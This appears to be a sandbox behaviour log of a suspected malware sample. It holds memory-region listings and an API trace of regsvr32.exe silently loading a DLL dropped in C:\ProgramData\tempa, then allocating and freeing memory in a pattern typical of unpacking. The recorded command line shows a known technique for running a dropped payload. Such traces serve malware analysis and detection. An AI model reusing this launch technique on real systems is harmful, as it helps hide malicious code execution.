region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 2245
start_va = 0x7ffdc000
end_va = 0x7ffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdc000"
filename = ""
Region:
id = 2246
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 2247
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2248
start_va = 0x20000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 2249
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2250
start_va = 0x320000
end_va = 0x41ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000320000"
filename = ""
Region:
id = 2251
start_va = 0x73e90000
end_va = 0x7402dfff
entry_point = 0x73e90000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 2252
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2253
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2254
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 2255
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2256
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2257
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2258
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2259
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 2260
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 2261
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2262
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2263
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2264
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 2265
start_va = 0x130000
end_va = 0x1f7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000130000"
filename = ""
Region:
id = 2266
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 2267
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2268
start_va = 0xc0000
end_va = 0xc6fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000c0000"
filename = ""
Region:
id = 2269
start_va = 0xd0000
end_va = 0xd1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 2270
start_va = 0xe0000
end_va = 0xe1fff
entry_point = 0xe0000
region_type = mapped_file
name = "regsvr32.exe.mui"
filename = "\\Windows\\System32\\en-US\\regsvr32.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\regsvr32.exe.mui")
Region:
id = 2271
start_va = 0x200000
end_va = 0x300fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000200000"
filename = ""
Region:
id = 2272
start_va = 0x310000
end_va = 0x310fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000310000"
filename = ""
Region:
id = 2273
start_va = 0x420000
end_va = 0x420fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000420000"
filename = ""
Region:
id = 2274
start_va = 0x440000
end_va = 0x441fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000440000"
filename = ""
Region:
id = 2275
start_va = 0xa50000
end_va = 0x164ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a50000"
filename = ""
Region:
id = 2276
start_va = 0x450000
end_va = 0x4abfff
entry_point = 0x450000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2277
start_va = 0x450000
end_va = 0x4abfff
entry_point = 0x450000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2278
start_va = 0x74fc0000
end_va = 0x74fcbfff
entry_point = 0x74fc0000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 2279
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 2280
start_va = 0x450000
end_va = 0x5cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000450000"
filename = ""
Region:
id = 2291
start_va = 0x450000
end_va = 0x52efff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000450000"
filename = ""
Region:
id = 2292
start_va = 0x590000
end_va = 0x5cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000590000"
filename = ""
Region:
id = 2293
start_va = 0x5d0000
end_va = 0x6e7fff
entry_point = 0x5d0000
region_type = mapped_file
name = "marxvxinhhm64.dll"
filename = "\\ProgramData\\tempa\\marxvxinhhm64.dll" (normalized: "c:\\programdata\\tempa\\marxvxinhhm64.dll")
Region:
id = 2294
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2295
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 2296
start_va = 0x73b10000
end_va = 0x73b20fff
entry_point = 0x73b10000
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 2297
start_va = 0x73b00000
end_va = 0x73b08fff
entry_point = 0x73b00000
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 2298
start_va = 0x74f10000
end_va = 0x74f28fff
entry_point = 0x74f10000
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 2299
start_va = 0x73af0000
end_va = 0x73afefff
entry_point = 0x73af0000
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 2300
start_va = 0x430000
end_va = 0x431fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000430000"
filename = ""
Region:
id = 2301
start_va = 0x6f0000
end_va = 0x7d9fff
entry_point = 0x0
region_type = private
name = "private_0x00000000006f0000"
filename = ""
Region:
id = 2350
start_va = 0x530000
end_va = 0x530fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000530000"
filename = ""
Region:
id = 2351
start_va = 0x530000
end_va = 0x534fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000530000"
filename = ""
Region:
id = 2352
start_va = 0x530000
end_va = 0x531fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000530000"
filename = ""
Region:
id = 2353
start_va = 0x530000
end_va = 0x530fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000530000"
filename = ""
Region:
id = 2354
start_va = 0x530000
end_va = 0x546fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000530000"
filename = ""
Region:
id = 2355
start_va = 0x6f0000
end_va = 0x82ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000006f0000"
filename = ""
Region:
id = 2356
start_va = 0x830000
end_va = 0x948fff
entry_point = 0x830000
region_type = mapped_file
name = "marxvxinhhm98.dll"
filename = "\\ProgramData\\tempa\\marxvxinhhm98.dll" (normalized: "c:\\programdata\\tempa\\marxvxinhhm98.dll")
Region:
id = 2362
start_va = 0x430000
end_va = 0x431fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000430000"
filename = ""
Region:
id = 2363
start_va = 0x950000
end_va = 0xa3afff
entry_point = 0x0
region_type = private
name = "private_0x0000000000950000"
filename = ""
Region:
id = 2407
start_va = 0x530000
end_va = 0x530fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000530000"
filename = ""
Region:
id = 2408
start_va = 0x530000
end_va = 0x534fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000530000"
filename = ""
Region:
id = 2409
start_va = 0x530000
end_va = 0x531fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000530000"
filename = ""
Region:
id = 2410
start_va = 0x530000
end_va = 0x530fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000530000"
filename = ""
Region:
id = 2411
start_va = 0x530000
end_va = 0x546fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000530000"
filename = ""
Region:
id = 2412
start_va = 0x1650000
end_va = 0x178ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001650000"
filename = ""
Region:
id = 2418
start_va = 0x7ff50000
end_va = 0x7ffaffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ff50000"
filename = ""
Region:
id = 2419
start_va = 0x530000
end_va = 0x58efff
entry_point = 0x0
region_type = private
name = "private_0x0000000000530000"
filename = ""
Region:
id = 2423
start_va = 0x1790000
end_va = 0x188ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001790000"
filename = ""
Region:
id = 2425
start_va = 0x430000
end_va = 0x430fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000430000"
filename = ""
Region:
id = 2426
start_va = 0x950000
end_va = 0x9cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000950000"
filename = ""
Region:
id = 2441
start_va = 0x9d0000
end_va = 0x9d0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 2769
start_va = 0x9d0000
end_va = 0x9d0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 2781
start_va = 0x1890000
end_va = 0x198ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001890000"
filename = ""
Region:
id = 3110
start_va = 0x9d0000
end_va = 0x9d0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 3451
start_va = 0x9d0000
end_va = 0x9d0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 3882
start_va = 0x9d0000
end_va = 0x9d0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 3894
start_va = 0x1990000
end_va = 0x1a8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001990000"
filename = ""
Region:
id = 4224
start_va = 0x9d0000
end_va = 0x9d0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 4564
start_va = 0x9d0000
end_va = 0x9d0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 4737
start_va = 0x9d0000
end_va = 0x9d0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 4749
start_va = 0x1a90000
end_va = 0x1b8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001a90000"
filename = ""
Region:
id = 5080
start_va = 0x9d0000
end_va = 0x9d0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 5422
start_va = 0x9d0000
end_va = 0x9d0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 5763
start_va = 0x9d0000
end_va = 0x9d0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 5775
start_va = 0x1b90000
end_va = 0x1c8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001b90000"
filename = ""
Region:
id = 6402
start_va = 0x9d0000
end_va = 0x9d0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 6745
start_va = 0x9d0000
end_va = 0x9d0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 6757
start_va = 0x1c90000
end_va = 0x1d8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001c90000"
filename = ""
Region:
id = 7086
start_va = 0x9d0000
end_va = 0x9d0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 7428
start_va = 0x9d0000
end_va = 0x9d0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 7769
start_va = 0x9d0000
end_va = 0x9d0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 7781
start_va = 0x1d90000
end_va = 0x1e8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001d90000"
filename = ""
Region:
id = 8111
start_va = 0x9d0000
end_va = 0x9d0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 8452
start_va = 0x9d0000
end_va = 0x9d0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 8793
start_va = 0x9d0000
end_va = 0x9d0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 8805
start_va = 0x1e90000
end_va = 0x1f8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001e90000"
filename = ""
Thread:
id = 219
os_tid = 0xf1c
[0085.258] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fdc4 | out: lpSystemTimeAsFileTime=0x12fdc4*(dwLowDateTime=0xe3508b70, dwHighDateTime=0x1d469c7))
[0085.258] GetCurrentProcessId () returned 0xf18
[0085.258] GetCurrentThreadId () returned 0xf1c
[0085.258] GetTickCount () returned 0x231b9
[0085.258] QueryPerformanceCounter (in: lpPerformanceCount=0x12fdbc | out: lpPerformanceCount=0x12fdbc*=1815920300000) returned 1
[0085.258] GetStartupInfoW (in: lpStartupInfo=0x12fd64 | out: lpStartupInfo=0x12fd64*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\regsvr32.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x5f5e100, hStdOutput=0x0, hStdError=0x12fdcc))
[0085.259] GetModuleHandleA (lpModuleName=0x0) returned 0xa40000
[0085.259] __set_app_type (_Type=0x2)
[0085.259] __p__fmode () returned 0x757a31f4
[0085.259] __p__commode () returned 0x757a31fc
[0085.259] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa42873) returned 0x0
[0085.259] __wgetmainargs (in: _Argc=0xa443f8, _Argv=0xa44400, _Env=0xa443fc, _DoWildCard=0, _StartInfo=0xa4440c | out: _Argc=0xa443f8, _Argv=0xa44400, _Env=0xa443fc) returned 0
[0085.260] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0085.260] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x22, ProcessInformation=0x12f0dc, ProcessInformationLength=0x4) returned 0x0
[0085.260] lstrlenW (lpString="C:\\ProgramData\\tempa\\marxvxinhhm64.dll") returned 38
[0085.260] OleInitialize (pvReserved=0x0) returned 0x0
[0085.303] SetErrorMode (uMode=0x1) returned 0x0
[0085.303] _wsplitpath_s (in: _FullPath="C:\\ProgramData\\tempa\\marxvxinhhm64.dll", _Drive=0x0, _DriveCount=0x0, _Dir=0x0, _DirCount=0x0, _Filename=0x0, _FilenameCount=0x0, _Ext=0x12eac0, _ExtCount=0x100 | out: _Drive=0x0, _Dir=0x0, _Filename=0x0, _Ext=".dll") returned 0x0
[0085.303] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".dll", ulOptions=0x0, samDesired=0x1, phkResult=0x12e8bc | out: phkResult=0x12e8bc*=0x92) returned 0x0
[0085.303] RegQueryValueW (in: hKey=0x92, lpSubKey=0x0, lpData=0x12e8c0, lpcbData=0x12e8b8 | out: lpData="dllfile", lpcbData=0x12e8b8) returned 0x0
[0085.304] RegCloseKey (hKey=0x92) returned 0x0
[0085.304] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="dllfile", ulOptions=0x0, samDesired=0x1, phkResult=0x12e8bc | out: phkResult=0x12e8bc*=0x92) returned 0x0
[0085.304] RegOpenKeyExW (in: hKey=0x92, lpSubKey="AutoRegister", ulOptions=0x0, samDesired=0x1, phkResult=0x12e8b0 | out: phkResult=0x12e8b0*=0x0) returned 0x2
[0085.304] RegCloseKey (hKey=0x92) returned 0x0
[0085.304] SetErrorMode (uMode=0x1) returned 0x1
[0085.304] LoadLibraryExW (lpLibFileName="C:\\ProgramData\\tempa\\marxvxinhhm64.dll", hFile=0x0, dwFlags=0x8)
[0085.318] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0085.318] GetProcAddress (hModule=0x75370000, lpProcName="VirtualAlloc") returned 0x753c2fb6
[0085.318] GetProcAddress (hModule=0x75370000, lpProcName="VirtualFree") returned 0x753c1da4
[0085.319] GetProcAddress (hModule=0x75370000, lpProcName="VirtualProtect") returned 0x753b2341
[0085.319] VirtualAlloc (lpAddress=0x0, dwSize=0x1800, flAllocationType=0x1000, flProtect=0x4) returned 0x430000
[0085.319] VirtualAlloc (lpAddress=0x0, dwSize=0xe990e, flAllocationType=0x1000, flProtect=0x4) returned 0x6f0000
[0085.445] VirtualFree (lpAddress=0x6f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0085.533] VirtualAlloc (lpAddress=0x0, dwSize=0xd0e, flAllocationType=0x1000, flProtect=0x4) returned 0x530000
[0085.534] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0085.534] VirtualAlloc (lpAddress=0x0, dwSize=0x450e, flAllocationType=0x1000, flProtect=0x4) returned 0x530000
[0085.536] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0085.536] VirtualAlloc (lpAddress=0x0, dwSize=0x1b0e, flAllocationType=0x1000, flProtect=0x4) returned 0x530000
[0085.537] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0085.537] VirtualAlloc (lpAddress=0x0, dwSize=0x50e, flAllocationType=0x1000, flProtect=0x4) returned 0x530000
[0085.537] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0085.538] VirtualAlloc (lpAddress=0x0, dwSize=0x1610e, flAllocationType=0x1000, flProtect=0x4) returned 0x530000
[0085.554] SetThreadLocale (Locale=0x400) returned 1
[0085.555] GetVersion () returned 0x1db10106
[0085.555] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0085.555] GetProcAddress (hModule=0x75370000, lpProcName="GetThreadPreferredUILanguages") returned 0x753b22d7
[0085.555] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0085.555] GetProcAddress (hModule=0x75370000, lpProcName="SetThreadPreferredUILanguages") returned 0x753ae627
[0085.555] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0085.556] GetProcAddress (hModule=0x75370000, lpProcName="GetThreadUILanguage") returned 0x753aae42
[0085.556] GetSystemInfo (in: lpSystemInfo=0x12e924 | out: lpSystemInfo=0x12e924*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03))
[0085.556] GetCommandLineW () returned="\"C:\\Windows\\System32\\regsvr32.exe\" /s \"C:\\ProgramData\\tempa\\marxvxinhhm64.dll\""
[0085.556] GetStartupInfoW (in: lpStartupInfo=0x12e900 | out: lpStartupInfo=0x12e900*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\regsvr32.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x24a, hStdError=0x1f80))
[0085.556] GetACP () returned 0x4e4
[0085.556] GetCurrentThreadId () returned 0xf1c
[0085.556] GetVersion () returned 0x1db10106
[0085.556] GetVersionExW (in: lpVersionInformation=0x12e844*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x12e890, dwMinorVersion=0x12e890, dwBuildNumber=0x332b20, dwPlatformId=0x12e8f4, szCSDVersion="\xfa22\x76f7\x70f2\x76f7\x6054\x76f6\x9582\x7532\xffff\xffff\x25") | out: lpVersionInformation=0x12e844*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0085.556] GetModuleFileNameW (in: hModule=0x5d0000, lpFilename=0x12c704, nSize=0x20a | out: lpFilename="C:\\ProgramData\\tempa\\marxvxinhhm64.dll" (normalized: "c:\\programdata\\tempa\\marxvxinhhm64.dll")) returned 0x26
[0085.556] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12c4ee, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\regsvr32.exe" (normalized: "c:\\windows\\system32\\regsvr32.exe")) returned 0x20
[0085.556] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x6f0000
[0085.557] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12c468 | out: phkResult=0x12c468*=0x0) returned 0x2
[0085.557] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12c468 | out: phkResult=0x12c468*=0x0) returned 0x2
[0085.557] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12c468 | out: phkResult=0x12c468*=0x0) returned 0x2
[0085.557] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12c468 | out: phkResult=0x12c468*=0x0) returned 0x2
[0085.557] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12c468 | out: phkResult=0x12c468*=0x0) returned 0x2
[0085.557] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12c468 | out: phkResult=0x12c468*=0x0) returned 0x2
[0085.557] GetUserDefaultUILanguage () returned 0x409
[0085.558] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1
[0085.558] GetThreadUILanguage () returned 0x120409
[0085.558] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12c444, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12c46c | out: pulNumLanguages=0x12c444, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12c46c) returned 1
[0085.558] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12c444, pwszLanguagesBuffer=0x81a680, pcchLanguagesBuffer=0x12c46c | out: pulNumLanguages=0x12c444, pwszLanguagesBuffer=0x81a680, pcchLanguagesBuffer=0x12c46c) returned 1
[0085.558] FindFirstFileW (in: lpFileName="C:\\ProgramData\\tempa\\marxvxinhhm64.en-US", lpFindFileData=0x12c214 | out: lpFindFileData=0x12c214) returned 0xffffffff
[0085.559] FindFirstFileW (in: lpFileName="C:\\ProgramData\\tempa\\marxvxinhhm64.en", lpFindFileData=0x12c214 | out: lpFindFileData=0x12c214) returned 0xffffffff
[0085.559] GetUserDefaultUILanguage () returned 0x409
[0085.559] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0x12c488, cchData=4 | out: lpLCData="ENU") returned 4
[0085.559] FindFirstFileW (in: lpFileName="C:\\ProgramData\\tempa\\marxvxinhhm64.ENU", lpFindFileData=0x12c214 | out: lpFindFileData=0x12c214) returned 0xffffffff
[0085.559] FindFirstFileW (in: lpFileName="C:\\ProgramData\\tempa\\marxvxinhhm64.EN", lpFindFileData=0x12c214 | out: lpFindFileData=0x12c214) returned 0xffffffff
[0085.559] LoadStringW (in: hInstance=0x5d0000, uID=0xffcc, lpBuffer=0x12c934, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20
[0085.560] LoadStringW (in: hInstance=0x5d0000, uID=0xffcb, lpBuffer=0x12c934, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17
[0085.560] LoadStringW (in: hInstance=0x5d0000, uID=0xffca, lpBuffer=0x12c934, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28
[0085.560] LoadStringW (in: hInstance=0x5d0000, uID=0xffc9, lpBuffer=0x12c934, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15
[0085.560] LoadStringW (in: hInstance=0x5d0000, uID=0xffc8, lpBuffer=0x12c934, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0085.560] LoadStringW (in: hInstance=0x5d0000, uID=0xffc7, lpBuffer=0x12c934, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17
[0085.560] LoadStringW (in: hInstance=0x5d0000, uID=0xffc5, lpBuffer=0x12c934, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15
[0085.560] LoadStringW (in: hInstance=0x5d0000, uID=0xffc6, lpBuffer=0x12c934, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10
[0085.560] LoadStringW (in: hInstance=0x5d0000, uID=0xffd4, lpBuffer=0x12c934, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0085.560] LoadStringW (in: hInstance=0x5d0000, uID=0xffc1, lpBuffer=0x12c934, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10
[0085.560] LoadStringW (in: hInstance=0x5d0000, uID=0xffd3, lpBuffer=0x12c934, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24
